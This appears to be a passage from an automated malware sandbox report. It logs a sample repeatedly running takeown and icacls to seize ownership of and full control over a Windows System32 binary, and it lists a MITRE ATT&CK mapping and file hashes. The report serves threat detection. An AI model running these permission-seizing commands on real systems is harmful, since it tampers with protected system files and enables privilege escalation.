C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5288
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1168
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5212
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1312
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5296
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1164
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5316
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5556
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5192
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5624
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5576
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5188
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:2348
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:320
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5488
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1840
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1896
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4764
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5292
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1968
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2152
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3816
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5600
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4852
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:5812
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5876
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2180
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5388
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5908
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6040
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5604
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5940
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4276
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3604
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4532
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:60
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1560 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4224
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:1956
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4324
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2752
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:624
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:4260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3064
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:968
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4060
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1052
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:3408
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1712
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2996
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:944
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:836
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:116
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:5592
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4884
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3256
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:872
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
514KB
MD5fdd37962a54814f55dc56ef6e4a062af
SHA1aa2423c8a3a207f607fd03f02538dbb557e69e3c
SHA256142a2027b957a97f2f723b605a2e2a95586dbcc54ce3a6215b0fdb04b1d047e7
SHA5125d4ba43c9f88c42b2321baa7dce849d1da8472ee4bba694134f4045300210ae5a8ee4b3789491f2c20b15e0e19f13ce9a3b52358256dcebbdd2dfe7117ec3ba4
-
Filesize
514KB
MD5ccde813d93df0efc54e4a346df173075
SHA1d2211031e75c1b2c8499cc6320499fd97dbd5819
SHA256e26c0e4c063a840d34212f0973816ae4bee56e92a52a0ece8c2cf765d079e1bc
SHA5124b5ea53fabc7edf037e4b4809f68d5120a58395c27def5529af5a06d92c50b2bd98dce540a4aeceb4690b2ae2481f4857d411a42227adb087b11427f180e859d
-
Filesize
514KB
MD536549e81f1ad0a1fde7a0f1ce6ff37c8
SHA1b25177a72bd9901d52bb3a2e6a0c996a7acec7aa
SHA2567445a962f7a28a1364e87a1c01c5a4e9a60a02e9bf20945f42f80b3b8b96b99c
SHA51247d5b15a86c99eeb09ad30db9215daccd1bf19a7562ea49328a61cb8a81269d8d5108a36fe77c7acc4774a67df0e5865166c00fc68dd2b91cb2cff2ed726d44e
-
Filesize
448KB
MD50a5ead827c6bb13f7252fa02872436f1
SHA1784a3ff7a2b1a1f96d2c1b67c141e21a2ac7faa4
SHA2566f1d6c5e3c0110e6b658f8db6938a128b6d51f89dd8e8a74e13c03e7c01b1770
SHA512f4146c306ee5bd226bc6e60a294d19ef0a544dff9a4f27faffaa4059a9dcf05598184afef31cdb999b064c893ca484d8d6e6ebdf1e990ceeef56c6a791c440a1
-
Filesize
64KB
MD583cba40e6aea8cb582a53c8b772a0413
SHA1da36f9bd8290c62c4e0dcc5d503d74618759979f
SHA256f485d1c36ef4591406816740d211d5297bb569ce597b085419364cf469bf57de
SHA512bee5e7340563b3e8f8954fbe4ac95b082e72a83ddbda0b42e2ea0cf0092979105da24c04ae79f283abba5cc0b39aa6d47b31431aff3ac3c869509cfc1d9dbd00
-
Filesize
514KB
MD5a7705c19fc5518a70d1bb7cadfa74143
SHA18ccd866cf63cc2750b5ea922672183d6169d96f9
SHA2563f35203bb1a9e4cbbab5d0a6155092d49b4e2d3be52e400cc08447cca646955f
SHA5124d4a5917f32190538c25cb27aa5285078dae109eb6916dd592a2158b832209133a88b5fe77859b607f84fc25e5b47f5f7dcfa014e5753414862864628ef4f09c
-
Filesize
514KB
MD5d11574a983488bcc2ed5803e2e0d9a63
SHA180548f16bfd4b21981a313f53e7e272e87042215
SHA256efae7ffd996075719e4b562b202ca2fcd315c02e9fc9bb247bc901b48f69d619
SHA512968df18922bb277f78247b08bbce83338659c885cd25c22294a695ca7d203a39f7a193ff480d7ee84f3b1b119b549d4896ad03432fea41d796dc5a4d3ce248c9